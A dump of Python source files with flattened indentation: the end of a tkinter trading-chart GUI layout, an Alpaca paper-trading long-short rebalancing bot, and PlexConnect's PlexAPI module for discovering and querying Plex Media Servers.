app.label_CmdOrd.place(height=250,width=198,x=0,y=event.height-320-260) #heigth:h = event.height-320-260
app.text_Sys.place(height=150,width=event.width-30,x=10,y=event.height-160)
app.text_Sys_Scrl.place(height=150,width=10,x=event.width-20,y=event.height-160)
app.label_P.place(x=event.width-210,y=150)
app.CB_MrgT.place(x=event.width-210,y=170)
app.CB_Lvrg.place(x=event.width-110,y=170)
app.button_MrLvSet.place(x=event.width-65,y=170)
app.CB_P.place(x=event.width-210,y=200)
app.MPSL.place(x=event.width-210,y=230)
app.SPSL.place(x=event.width-110,y=230)
if GS=='TICK':
app.graph_1.place(width=event.width-490,height=event.height-320,x=10,y=150)
elif GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
app.graph_Cn.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_VV.place(x=10,y=event.height-300,height=100,width=event.width-490)
app.graph_BTCD.place(x=10,y=180,height=100,width=event.width-490)
elif GS=='CANDLE SUMM':
app.graph_Sm.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_Tb.place(x=10,y=150,height=30,width=event.width-490)
app.graph_Td.place(x=10,y=event.height-200,height=30,width=event.width-490)
if Ord_Zm==False:
app.graph_2.place(x=event.width-420,y=150,height=event.height-320,width=200)
else:
app.graph_Zm.place(x=event.width-420,y=150,height=event.height-320,width=200)
app.Scale_TP.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=180)
app.Scale_SL.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=150+45+(event.height-320-60)/2)
app.PSDvar_L.place(height=30,width=30,x=event.width-480,y=150+15+(event.height-320-60)/2)
app.PSDvar_S.place(height=30,width=30,x=event.width-480+30,y=150+15+(event.height-320-60)/2)
app.button_PTP.place(height=30,width=45,x=event.width-480,y=150)
app.button_PTPR.place(height=30,width=15,x=event.width-435,y=150)
app.button_PSL.place(height=30,width=45,x=event.width-480,y=event.height-200)
app.button_PSLR.place(height=30,width=15,x=event.width-435,y=event.height-200)
app.button_Ord.place(x=event.width-420,y=150,height=30,width=100)
app.button_OrdTmr.place(x=event.width-320,y=150,height=30,width=100)
grH = event.height-320
grW = event.width-340
root.bind("<Configure>", config)
#______________MAIN WINDOW GUI EVENTS END
root.mainloop()
|
long-short.py
|
import os
import sys
import datetime
import threading
import pandas as pd
import alpaca_trade_api as tradeapi
import time
from alpaca_trade_api.rest import TimeFrame
API_KEY = os.getenv('PAPER_KEY')
API_SECRET = os.getenv('PAPER_SECRET')
APCA_API_BASE_URL = "https://paper-api.alpaca.markets"
class LongShort:
def __init__(self):
self.alpaca = tradeapi.REST(API_KEY, API_SECRET, APCA_API_BASE_URL, 'v2')
stockUniverse = ['DOMO', 'TLRY', 'SQ', 'MRO', 'AAPL', 'GM', 'SNAP', 'SHOP',
'SPLK', 'BA', 'AMZN', 'SUI', 'SUN', 'TSLA', 'CGC', 'SPWR',
'NIO', 'CAT', 'MSFT', 'PANW', 'OKTA', 'TWTR', 'TM',
'ATVI', 'GS', 'BAC', 'MS', 'TWLO', 'QCOM', ]
# Format the allStocks variable for use in the class.
self.allStocks = []
for stock in stockUniverse:
self.allStocks.append([stock, 0])
self.long = []
self.short = []
self.qShort = None
self.qLong = None
self.adjustedQLong = None
self.adjustedQShort = None
self.blacklist = set()
self.longAmount = 0
self.shortAmount = 0
self.timeToClose = None
def run(self):
# First, cancel any existing orders so they don't impact our buying power.
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
# close positions from the previous day
positions = self.alpaca.list_positions()
for position in positions:
if (position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(float(position.qty))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
# Rebalance the portfolio every minute, making necessary trades.
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
if(self.timeToClose < (60 * 15)):
# Close all positions when 15 minutes til market close.
print("Market closing soon. Closing positions.")
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)
# quit program after market close
sys.exit('Market closed.')
else:
# Rebalance the portfolio.
tRebalance = threading.Thread(target=self.rebalance)
tRebalance.start()
tRebalance.join()
time.sleep(60)
# Wait for market to open.
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while(not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
def rebalance(self):
tRerank = threading.Thread(target=self.rerank)
tRerank.start()
tRerank.join()
# Clear existing orders again.
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
print("We are taking a long position in: " + str(self.long))
print("We are taking a short position in: " + str(self.short))
# Remove positions that are no longer in the short or long list, and make a list of positions that do not need to change. Adjust position quantities if needed.
executed = [[], []]
positions = self.alpaca.list_positions()
self.blacklist.clear()
for position in positions:
if(self.long.count(position.symbol) == 0):
# Position is not in long list.
if(self.short.count(position.symbol) == 0):
# Position not in short list either. Clear position.
if(position.side == "long"):
side = "sell"
else:
side = "buy"
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[abs(float(position.qty)), position.symbol, side, respSO])
tSO.start()
tSO.join()
else:
# Position in short list.
if(position.side == "long"):
# Position changed from long to short. Clear long position to prepare for short position.
side = "sell"
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[float(position.qty), position.symbol, side, respSO])
tSO.start()
tSO.join()
else:
if(abs(float(position.qty)) == self.qShort):
# Position is where we want it. Pass for now.
pass
else:
# Need to adjust position amount
diff = abs(float(position.qty)) - self.qShort
if(diff > 0):
# Too many short positions. Buy some back to rebalance.
side = "buy"
else:
# Too little short positions. Sell some more.
side = "sell"
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[abs(diff), position.symbol, side, respSO])
tSO.start()
tSO.join()
executed[1].append(position.symbol)
self.blacklist.add(position.symbol)
else:
# Position in long list.
if(position.side == "short"):
# Position changed from short to long. Clear short position to prepare for long position.
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[abs(float(position.qty)), position.symbol, "buy", respSO])
tSO.start()
tSO.join()
else:
if(float(position.qty) == self.qLong):
# Position is where we want it. Pass for now.
pass
else:
# Need to adjust position amount.
diff = abs(float(position.qty)) - self.qLong
if(diff > 0):
# Too many long positions. Sell some to rebalance.
side = "sell"
else:
# Too little long positions. Buy some more.
side = "buy"
respSO = []
tSO = threading.Thread(target=self.submitOrder, args=[abs(diff), position.symbol, side, respSO])
tSO.start()
tSO.join()
executed[0].append(position.symbol)
self.blacklist.add(position.symbol)
# Send orders to all remaining stocks in the long and short list.
respSendBOLong = []
tSendBOLong = threading.Thread(target=self.sendBatchOrder, args=[self.qLong, self.long, "buy", respSendBOLong])
tSendBOLong.start()
tSendBOLong.join()
respSendBOLong[0][0] += executed[0]
if(len(respSendBOLong[0][1]) > 0):
# Handle rejected/incomplete orders and determine new quantities to purchase.
respGetTPLong = []
tGetTPLong = threading.Thread(target=self.getTotalPrice, args=[respSendBOLong[0][0], respGetTPLong])
tGetTPLong.start()
tGetTPLong.join()
if (respGetTPLong[0] > 0):
self.adjustedQLong = round(self.longAmount / respGetTPLong[0], 2)
else:
self.adjustedQLong = -1
else:
self.adjustedQLong = -1
respSendBOShort = []
tSendBOShort = threading.Thread(target=self.sendBatchOrder, args=[self.qShort, self.short, "sell", respSendBOShort])
tSendBOShort.start()
tSendBOShort.join()
respSendBOShort[0][0] += executed[1]
if(len(respSendBOShort[0][1]) > 0):
# Handle rejected/incomplete orders and determine new quantities to purchase.
respGetTPShort = []
tGetTPShort = threading.Thread(target=self.getTotalPrice, args=[respSendBOShort[0][0], respGetTPShort])
tGetTPShort.start()
tGetTPShort.join()
if(respGetTPShort[0] > 0):
self.adjustedQShort = round(self.shortAmount / respGetTPShort[0], 2)
else:
self.adjustedQShort = -1
else:
self.adjustedQShort = -1
# Reorder stocks that didn't throw an error so that the equity quota is reached.
if(self.adjustedQLong > -1):
self.qLong = self.adjustedQLong - self.qLong
for stock in respSendBOLong[0][0]:
respResendBOLong = []
tResendBOLong = threading.Thread(target=self.submitOrder, args=[self.qLong, stock, "buy", respResendBOLong])
tResendBOLong.start()
tResendBOLong.join()
if(self.adjustedQShort > -1):
self.qShort = self.adjustedQShort - self.qShort
for stock in respSendBOShort[0][0]:
respResendBOShort = []
tResendBOShort = threading.Thread(target=self.submitOrder, args=[self.qShort, stock, "sell", respResendBOShort])
tResendBOShort.start()
tResendBOShort.join()
# Re-rank all stocks to adjust longs and shorts.
def rerank(self):
tRank = threading.Thread(target=self.rank)
tRank.start()
tRank.join()
# Grabs the top and bottom quarter of the sorted stock list to get the long and short lists.
longShortAmount = len(self.allStocks) // 4
self.long = []
self.short = []
for i, stockField in enumerate(self.allStocks):
if(i < longShortAmount):
self.short.append(stockField[0])
elif(i > (len(self.allStocks) - 1 - longShortAmount)):
self.long.append(stockField[0])
else:
continue
# Determine amount to long/short based on total stock price of each bucket.
equity = int(float(self.alpaca.get_account().equity))
# TODO: set back to 30% once equity reaches $2,000
self.shortAmount = equity * 0
self.longAmount = equity - self.shortAmount
respGetTPLong = []
tGetTPLong = threading.Thread(target=self.getTotalPrice, args=[self.long, respGetTPLong])
tGetTPLong.start()
tGetTPLong.join()
respGetTPShort = []
tGetTPShort = threading.Thread(target=self.getTotalPrice, args=[self.short, respGetTPShort])
tGetTPShort.start()
tGetTPShort.join()
self.qLong = round(self.longAmount / respGetTPLong[0], 2)
self.qShort = round(self.shortAmount / respGetTPShort[0], 2)
# Get the total price of the array of input stocks.
def getTotalPrice(self, stocks, resp):
totalPrice = 0
for stock in stocks:
bars = self.alpaca.get_bars(stock, TimeFrame.Minute,
pd.Timestamp('now').date(),
pd.Timestamp('now').date(), limit=1,
adjustment='raw')
totalPrice += bars[0].c
resp.append(totalPrice)
# Submit a batch order that returns completed and uncompleted orders.
def sendBatchOrder(self, qty, stocks, side, resp):
executed = []
incomplete = []
for stock in stocks:
if(self.blacklist.isdisjoint({stock})):
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder, args=[qty, stock, side, respSO])
tSubmitOrder.start()
tSubmitOrder.join()
if(not respSO[0]):
# Stock order did not go through, add it to incomplete.
incomplete.append(stock)
else:
executed.append(stock)
respSO.clear()
resp.append([executed, incomplete])
# Submit an order if quantity is above 0.
def submitOrder(self, qty, stock, side, resp):
if(qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except tradeapi.rest.APIError as e:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through. Error: " + e._error['message'])
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
# Get percent changes of the stock prices over the past 10 minutes.
def getPercentChanges(self):
length = 10
for i, stock in enumerate(self.allStocks):
bars = self.alpaca.get_bars(stock[0], TimeFrame.Minute,
pd.Timestamp('now').date(),
pd.Timestamp('now').date(), limit=length,
adjustment='raw')
self.allStocks[i][1] = (bars[len(bars) - 1].c - bars[0].o) / bars[0].o
# Mechanism used to rank the stocks, the basis of the Long-Short Equity Strategy.
def rank(self):
# Ranks all stocks by percent change over the past 10 minutes (higher is better).
tGetPC = threading.Thread(target=self.getPercentChanges)
tGetPC.start()
tGetPC.join()
# Sort the stocks in place by the percent change field (marked by pc).
self.allStocks.sort(key=lambda x: x[1])
# Run the LongShort class
ls = LongShort()
ls.run()
|
PlexAPI.py
|
#!/usr/bin/env python
"""
Collection of "connector functions" to Plex Media Server/MyPlex
PlexGDM:
loosely based on hippojay's plexGDM:
https://github.com/hippojay/script.plexbmc.helper... /resources/lib/plexgdm.py
Plex Media Server communication:
source (somewhat): https://github.com/hippojay/plugin.video.plexbmc
later converted from httplib to urllib2
Transcoder support:
PlexAPI_getTranscodePath() based on getTranscodeURL from pyplex/plexAPI
https://github.com/megawubs/pyplex/blob/master/plexAPI/info.py
MyPlex - Basic Authentication:
http://www.voidspace.org.uk/python/articles/urllib2.shtml
http://www.voidspace.org.uk/python/articles/authentication.shtml
http://stackoverflow.com/questions/2407126/python-urllib2-basic-auth-problem
http://stackoverflow.com/questions/111945/is-there-any-way-to-do-http-put-in-python
(and others...)
"""
import sys
import struct
import time
import urllib2, httplib, socket, StringIO, gzip
from threading import Thread
import Queue
import traceback
try:
import xml.etree.cElementTree as etree
except ImportError:
import xml.etree.ElementTree as etree
from urllib import urlencode, quote_plus
from Version import __VERSION__
from Debug import * # dprint(), prettyXML()
"""
storage for PMS addresses and additional information - now per aTV! (replaces global PMS_list)
syntax: PMS[<ATV_UDID>][PMS_UUID][<data>]
data: name, ip, ...type (local, myplex)
"""
g_PMS = {}
"""
Plex Media Server handling
parameters:
ATV_udid
uuid - PMS ID
name, scheme, ip, port, type, owned, token
"""
def declarePMS(ATV_udid, uuid, name, scheme, ip, port):
# store PMS information in g_PMS database
global g_PMS
if not ATV_udid in g_PMS:
g_PMS[ATV_udid] = {}
address = ip + ':' + port
baseURL = scheme+'://'+ip+':'+port
g_PMS[ATV_udid][uuid] = { 'name': name,
'scheme':scheme, 'ip': ip , 'port': port,
'address': address,
'baseURL': baseURL,
'local': '1',
'owned': '1',
'accesstoken': '',
'enableGzip': False
}
def updatePMSProperty(ATV_udid, uuid, tag, value):
# set property element of PMS by UUID
if not ATV_udid in g_PMS:
return '' # no server known for this aTV
if not uuid in g_PMS[ATV_udid]:
return '' # requested PMS not available
g_PMS[ATV_udid][uuid][tag] = value
def getPMSProperty(ATV_udid, uuid, tag):
# get name of PMS by UUID
if not ATV_udid in g_PMS:
return '' # no server known for this aTV
if not uuid in g_PMS[ATV_udid]:
return '' # requested PMS not available
return g_PMS[ATV_udid][uuid].get(tag, '')
def getPMSFromAddress(ATV_udid, address):
# find PMS by IP, return UUID
if not ATV_udid in g_PMS:
return '' # no server known for this aTV
for uuid in g_PMS[ATV_udid]:
if address in g_PMS[ATV_udid][uuid].get('address', None):
return uuid
return '' # IP not found
def getPMSAddress(ATV_udid, uuid):
# get address of PMS by UUID
if not ATV_udid in g_PMS:
return '' # no server known for this aTV
if not uuid in g_PMS[ATV_udid]:
return '' # requested PMS not available
return g_PMS[ATV_udid][uuid]['ip'] + ':' + g_PMS[ATV_udid][uuid]['port']
def getPMSCount(ATV_udid):
# get count of discovered PMS by UUID
if not ATV_udid in g_PMS:
return 0 # no server known for this aTV
return len(g_PMS[ATV_udid])
"""
PlexGDM
parameters:
none
result:
PMS_list - dict() of PMSs found
"""
IP_PlexGDM = '239.0.0.250' # multicast to PMS
Port_PlexGDM = 32414
Msg_PlexGDM = 'M-SEARCH * HTTP/1.0'
def PlexGDM():
dprint(__name__, 0, "***")
dprint(__name__, 0, "PlexGDM - looking up Plex Media Server")
dprint(__name__, 0, "***")
# setup socket for discovery -> multicast message
GDM = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
GDM.settimeout(1.0)
# Set the time-to-live for messages to 1 for local network
ttl = struct.pack('b', 1)
GDM.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
returnData = []
try:
# Send data to the multicast group
dprint(__name__, 1, "Sending discovery message: {0}", Msg_PlexGDM)
GDM.sendto(Msg_PlexGDM, (IP_PlexGDM, Port_PlexGDM))
# Look for responses from all recipients
while True:
try:
data, server = GDM.recvfrom(1024)
dprint(__name__, 1, "Received data from {0}", server)
dprint(__name__, 1, "Data received:\n {0}", data)
returnData.append( { 'from' : server,
'data' : data } )
except socket.timeout:
break
finally:
GDM.close()
discovery_complete = True
PMS_list = {}
if returnData:
for response in returnData:
update = { 'ip' : response.get('from')[0] }
# Check if we had a positive HTTP response
if "200 OK" in response.get('data'):
for each in response.get('data').split('\n'):
# decode response data
update['discovery'] = "auto"
#update['owned']='1'
#update['master']= 1
#update['role']='master'
if "Content-Type:" in each:
update['content-type'] = each.split(':')[1].strip()
elif "Resource-Identifier:" in each:
update['uuid'] = each.split(':')[1].strip()
elif "Name:" in each:
update['serverName'] = each.split(':')[1].strip().decode('utf-8', 'replace') # store in utf-8
elif "Port:" in each:
update['port'] = each.split(':')[1].strip()
elif "Updated-At:" in each:
update['updated'] = each.split(':')[1].strip()
elif "Version:" in each:
update['version'] = each.split(':')[1].strip()
PMS_list[update['uuid']] = update
if PMS_list=={}:
dprint(__name__, 0, "GDM: No servers discovered")
else:
dprint(__name__, 0, "GDM: Servers discovered: {0}", len(PMS_list))
for uuid in PMS_list:
dprint(__name__, 1, "{0} {1}:{2}", PMS_list[uuid]['serverName'], PMS_list[uuid]['ip'], PMS_list[uuid]['port'])
return PMS_list
"""
discoverPMS
parameters:
ATV_udid
CSettings - for manual PMS configuration. this one looks strange.
IP_self
optional:
tokenDict - dictionary of tokens for MyPlex, PlexHome
result:
g_PMS database for ATV_udid
"""
def discoverPMS(ATV_udid, CSettings, IP_self, tokenDict={}):
global g_PMS
g_PMS[ATV_udid] = {}
# install plex.tv "virtual" PMS - for myPlex, PlexHome
declarePMS(ATV_udid, 'plex.tv', 'plex.tv', 'https', 'plex.tv', '443')
updatePMSProperty(ATV_udid, 'plex.tv', 'local', '-')
updatePMSProperty(ATV_udid, 'plex.tv', 'owned', '-')
updatePMSProperty(ATV_udid, 'plex.tv', 'accesstoken', tokenDict.get('MyPlex', ''))
#debug
#declarePMS(ATV_udid, '2ndServer', '2ndServer', 'http', '192.168.178.22', '32400', 'local', '1', 'token')
#declarePMS(ATV_udid, 'remoteServer', 'remoteServer', 'http', '127.0.0.1', '1234', 'myplex', '1', 'token')
#debug
if 'PlexHome' in tokenDict:
authtoken = tokenDict.get('PlexHome')
else:
authtoken = tokenDict.get('MyPlex', '')
if authtoken=='':
# not logged into myPlex
# local PMS
if CSettings.getSetting('enable_plexgdm')=='False':
# defined in setting.cfg
ip = CSettings.getSetting('ip_pms')
# resolve hostname if needed
try:
ip2 = socket.gethostbyname(ip)
if ip != ip2:
dprint(__name__, 0, "PlexAPI - Hostname "+ip+" resolved to "+ip2)
ip = ip2
except:
dprint(__name__, 0, "PlexAPI - ip_dns "+ip+" could not be resolved")
port = CSettings.getSetting('port_pms')
XML = getXMLFromPMS('http://'+ip+':'+port, '/servers', None, '')
if XML==False:
pass # no response from manual defined server (Settings.cfg)
else:
Server = XML.find('Server')
uuid = Server.get('machineIdentifier')
name = Server.get('name')
declarePMS(ATV_udid, uuid, name, 'http', ip, port) # dflt: token='', local, owned
# todo - check IP to verify "local"?
else:
# PlexGDM
PMS_list = PlexGDM()
for uuid in PMS_list:
PMS = PMS_list[uuid]
declarePMS(ATV_udid, PMS['uuid'], PMS['serverName'], 'http', PMS['ip'], PMS['port']) # dflt: token='', local, owned
else:
# MyPlex servers
getPMSListFromMyPlex(ATV_udid, authtoken)
# all servers - update enableGzip
for uuid in g_PMS.get(ATV_udid, {}):
# enable Gzip if not on same host, local&remote PMS depending on setting
enableGzip = (not getPMSProperty(ATV_udid, uuid, 'ip')==IP_self) and ( \
(getPMSProperty(ATV_udid, uuid, 'local')=='1' and CSettings.getSetting('allow_gzip_pmslocal')=='True' ) or \
(getPMSProperty(ATV_udid, uuid, 'local')=='0' and CSettings.getSetting('allow_gzip_pmsremote')=='True') )
updatePMSProperty(ATV_udid, uuid, 'enableGzip', enableGzip)
# debug print all servers
dprint(__name__, 0, "Plex Media Servers found: {0}", len(g_PMS[ATV_udid])-1)
for uuid in g_PMS[ATV_udid]:
dprint(__name__, 1, str(g_PMS[ATV_udid][uuid]))
"""
getPMSListFromMyPlex
get Plex media Server List from plex.tv/pms/resources
poke every PMS at every given address (plex.tv tends to cache a LOT...)
-> by design this leads to numerous threads ending in URLErrors like <timed out> or <Connection refused>
"""
def getPMSListFromMyPlex(ATV_udid, authtoken):
dprint(__name__, 0, "***")
dprint(__name__, 0, "poke plex.tv - request Plex Media Server list")
dprint(__name__, 0, "***")
XML = getXMLFromPMS('https://plex.tv', '/api/resources?includeHttps=1', {}, authtoken)
if XML==False:
pass # no data from MyPlex
else:
queue = Queue.Queue()
threads = []
PMSsPoked = 0
for Dir in XML.getiterator('Device'):
if Dir.get('product','') == "Plex Media Server" and Dir.get('provides','') == "server":
uuid = Dir.get('clientIdentifier')
name = Dir.get('name')
token = Dir.get('accessToken', authtoken)
owned = Dir.get('owned', '0')
if Dir.find('Connection') == None:
continue # no valid connection - skip
PMSsPoked +=1
# multiple connection possible - poke either one, fastest response wins
for Con in Dir.getiterator('Connection'):
protocol = Con.get('protocol')
ip = Con.get('address')
port = Con.get('port')
uri = Con.get('uri')
local = Con.get('local')
dprint(__name__, 0, "poke {0} ({1}) at {2}", name, uuid, uri)
# poke PMS, own thread for each poke
PMSInfo = { 'uuid': uuid, 'name': name, 'token': token, 'owned': owned, 'local': local, \
'protocol': protocol, 'ip': ip, 'port': port, 'uri': uri }
PMS = { 'baseURL': uri, 'path': '/', 'options': None, 'token': token, \
'data': PMSInfo }
t = Thread(target=getXMLFromPMSToQueue, args=(PMS, queue))
t.start()
threads.append(t)
# wait for requests being answered
# - either all communication threads done
# - or at least one response received from every PMS (early exit)
ThreadsAlive = -1
PMSsCnt = 0
while ThreadsAlive != 0 and PMSsPoked != PMSsCnt:
# check for "living" threads - basically a manual t.join()
ThreadsAlive = 0
for t in threads:
if t.isAlive():
ThreadsAlive += 1
# analyse PMS/http response - declare new PMS
if not queue.empty():
(PMSInfo, PMS) = queue.get()
if PMS==False:
# communication error - skip this connection
continue
uuid = PMSInfo['uuid']
name = PMSInfo['name']
if uuid != PMS.getroot().get('machineIdentifier') or \
name != PMS.getroot().get('friendlyName'):
# response from someone - but not the poked PMS - skip this connection
continue
token = PMSInfo['token']
owned = PMSInfo['owned']
local = PMSInfo['local']
protocol = PMSInfo['protocol']
ip = PMSInfo['ip']
port = PMSInfo['port']
uri = PMSInfo['uri']
if not uuid in g_PMS[ATV_udid]: # PMS uuid not yet handled, so take it
PMSsCnt += 1
dprint(__name__, 0, "response {0} ({1}) at {2}", name, uuid, uri)
declarePMS(ATV_udid, uuid, name, protocol, ip, port) # dflt: token='', local, owned - updated later
updatePMSProperty(ATV_udid, uuid, 'accesstoken', token)
updatePMSProperty(ATV_udid, uuid, 'owned', owned)
updatePMSProperty(ATV_udid, uuid, 'local', local)
updatePMSProperty(ATV_udid, uuid, 'baseURL', uri) # set in declarePMS, overwrite for https encryption
elif local=='1': # Update udid if local instance is found
dprint(__name__, 0, "update to {0} ({1}) at {2}", name, uuid, uri)
declarePMS(ATV_udid, uuid, name, protocol, ip, port) # dflt: token='', local, owned - updated later
updatePMSProperty(ATV_udid, uuid, 'accesstoken', token)
updatePMSProperty(ATV_udid, uuid, 'owned', owned)
updatePMSProperty(ATV_udid, uuid, 'local', local)
updatePMSProperty(ATV_udid, uuid, 'baseURL', uri) # set in declarePMS, overwrite for https encryption
"""
Plex Media Server communication
parameters:
host
path
options - dict() of PlexConnect-options as received from aTV, None for no std. X-Plex-Args
authtoken - authentication answer from MyPlex Sign In
result:
returned XML or 'False' in case of error
"""
def getXMLFromPMS(baseURL, path, options={}, authtoken='', enableGzip=False):
xargs = {}
if not options==None:
xargs = getXArgsDeviceInfo(options)
if not authtoken=='':
xargs['X-Plex-Token'] = authtoken
dprint(__name__, 1, "URL: {0}{1}", baseURL, path)
dprint(__name__, 1, "xargs: {0}", xargs)
request = urllib2.Request(baseURL+path , None, xargs)
request.add_header('User-agent', 'PlexConnect')
if enableGzip:
request.add_header('Accept-encoding', 'gzip')
try:
response = urllib2.urlopen(request, timeout=20)
except (urllib2.URLError, httplib.HTTPException) as e:
dprint(__name__, 1, 'No Response from Plex Media Server')
if hasattr(e, 'reason'):
dprint(__name__, 1, "We failed to reach a server. Reason: {0}", e.reason)
elif hasattr(e, 'code'):
dprint(__name__, 1, "The server couldn't fulfill the request. Error code: {0}", e.code)
dprint(__name__, 1, 'Traceback:\n{0}', traceback.format_exc())
return False
except IOError:
dprint(__name__, 0, 'Error loading response XML from Plex Media Server:\n{0}', traceback.format_exc())
return False
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO.StringIO(response.read())
file = gzip.GzipFile(fileobj=buf)
XML = etree.parse(file)
else:
# parse into etree
XML = etree.parse(response)
dprint(__name__, 1, "====== received PMS-XML ======")
dprint(__name__, 1, XML.getroot())
dprint(__name__, 1, "====== PMS-XML finished ======")
#XMLTree = etree.ElementTree(etree.fromstring(response))
return XML
def getXMLFromPMSToQueue(PMS, queue):
XML = getXMLFromPMS(PMS['baseURL'],PMS['path'],PMS['options'],PMS['token'])
queue.put( (PMS['data'], XML) )
def getXArgsDeviceInfo(options={}):
xargs = dict()
xargs['X-Plex-Device'] = 'AppleTV'
xargs['X-Plex-Model'] = '2,3' # Base it on AppleTV model.
#if not options is None:
if 'PlexConnectUDID' in options:
xargs['X-Plex-Client-Identifier'] = options['PlexConnectUDID'] # UDID for MyPlex device identification
if 'PlexConnectATVName' in options:
xargs['X-Plex-Device-Name'] = options['PlexConnectATVName'] # "friendly" name: aTV-Settings->General->Name.
xargs['X-Plex-Platform'] = 'iOS'
xargs['X-Plex-Client-Platform'] = 'iOS'
xargs['X-Plex-Client-Profile-Extra'] = 'add-transcode-target(type=MusicProfile&context=streaming&protocol=hls&container=mpegts&audioCodec=aac)+add-transcode-target(type=videoProfile&context=streaming&protocol=hls&container=mpegts&videoCodec=h264&audioCodec=aac,mp3&replace=true)'
if 'DolbyDigital' in options:
if options['DolbyDigital']:
xargs['X-Plex-Client-Profile-Extra'] = 'add-transcode-target(type=MusicProfile&context=streaming&protocol=hls&container=mpegts&audioCodec=aac)+add-transcode-target(type=videoProfile&context=streaming&protocol=hls&container=mpegts&videoCodec=h264&audioCodec=ac3&replace=true)+add-limitation(scope=videoAudioCodec&scopeName=ac3&type=upperBound&name=audio.channels&value=6&onlyTranscodes=true&replace=true)'
if 'aTVFirmwareVersion' in options:
xargs['X-Plex-Platform-Version'] = options['aTVFirmwareVersion']
xargs['X-Plex-Product'] = 'PlexConnect'
xargs['X-Plex-Version'] = __VERSION__
return xargs
"""
provide combined XML representation of local servers' XMLs, eg. /library/section
parameters:
ATV_udid
path
type - owned <> shared (previously: local, myplex)
options
result:
XML
"""
def getXMLFromMultiplePMS(ATV_udid, path, type, options={}):
queue = Queue.Queue()
threads = []
root = etree.Element("MediaConverter")
root.set('friendlyName', type+' Servers')
for uuid in g_PMS.get(ATV_udid, {}):
if (type=='all' and getPMSProperty(ATV_udid, uuid, 'name')!='plex.tv') or \
(type=='owned' and getPMSProperty(ATV_udid, uuid, 'owned')=='1') or \
(type=='shared' and getPMSProperty(ATV_udid, uuid, 'owned')=='0') or \
(type=='local' and getPMSProperty(ATV_udid, uuid, 'local')=='1') or \
(type=='remote' and getPMSProperty(ATV_udid, uuid, 'local')=='0'):
Server = etree.SubElement(root, 'Server') # create "Server" node
Server.set('name', getPMSProperty(ATV_udid, uuid, 'name'))
Server.set('address', getPMSProperty(ATV_udid, uuid, 'ip'))
Server.set('port', getPMSProperty(ATV_udid, uuid, 'port'))
Server.set('baseURL', getPMSProperty(ATV_udid, uuid, 'baseURL'))
Server.set('local', getPMSProperty(ATV_udid, uuid, 'local'))
Server.set('owned', getPMSProperty(ATV_udid, uuid, 'owned'))
baseURL = getPMSProperty(ATV_udid, uuid, 'baseURL')
token = getPMSProperty(ATV_udid, uuid, 'accesstoken')
PMS_mark = 'PMS(' + getPMSProperty(ATV_udid, uuid, 'address') + ')'
Server.set('searchKey', PMS_mark + getURL('', '', '/Search/Entry.xml'))
# request XMLs, one thread for each
PMS = { 'baseURL':baseURL, 'path':path, 'options':options, 'token':token, \
'data': {'uuid': uuid, 'Server': Server} }
t = Thread(target=getXMLFromPMSToQueue, args=(PMS, queue))
t.start()
threads.append(t)
# wait for requests being answered
for t in threads:
t.join()
# add new data to root XML, individual Server
while not queue.empty():
(data, XML) = queue.get()
uuid = data['uuid']
Server = data['Server']
baseURL = getPMSProperty(ATV_udid, uuid, 'baseURL')
token = getPMSProperty(ATV_udid, uuid, 'accesstoken')
PMS_mark = 'PMS(' + getPMSProperty(ATV_udid, uuid, 'address') + ')'
if XML==False:
Server.set('size', '0')
else:
Server.set('size', XML.getroot().get('size', '0'))
for Dir in XML.getiterator('Directory'): # copy "Directory" content, add PMS to links
key = Dir.get('key') # absolute path
Dir.set('key', PMS_mark + getURL('', path, key))
Dir.set('refreshKey', getURL(baseURL, path, key) + '/refresh')
if 'thumb' in Dir.attrib:
Dir.set('thumb', PMS_mark + getURL('', path, Dir.get('thumb')))
if 'art' in Dir.attrib:
Dir.set('art', PMS_mark + getURL('', path, Dir.get('art')))
Server.append(Dir)
for Playlist in XML.getiterator('Playlist'): # copy "Playlist" content, add PMS to links
key = Playlist.get('key') # absolute path
Playlist.set('key', PMS_mark + getURL('', path, key))
if 'composite' in Playlist.attrib:
Playlist.set('composite', PMS_mark + getURL('', path, Playlist.get('composite')))
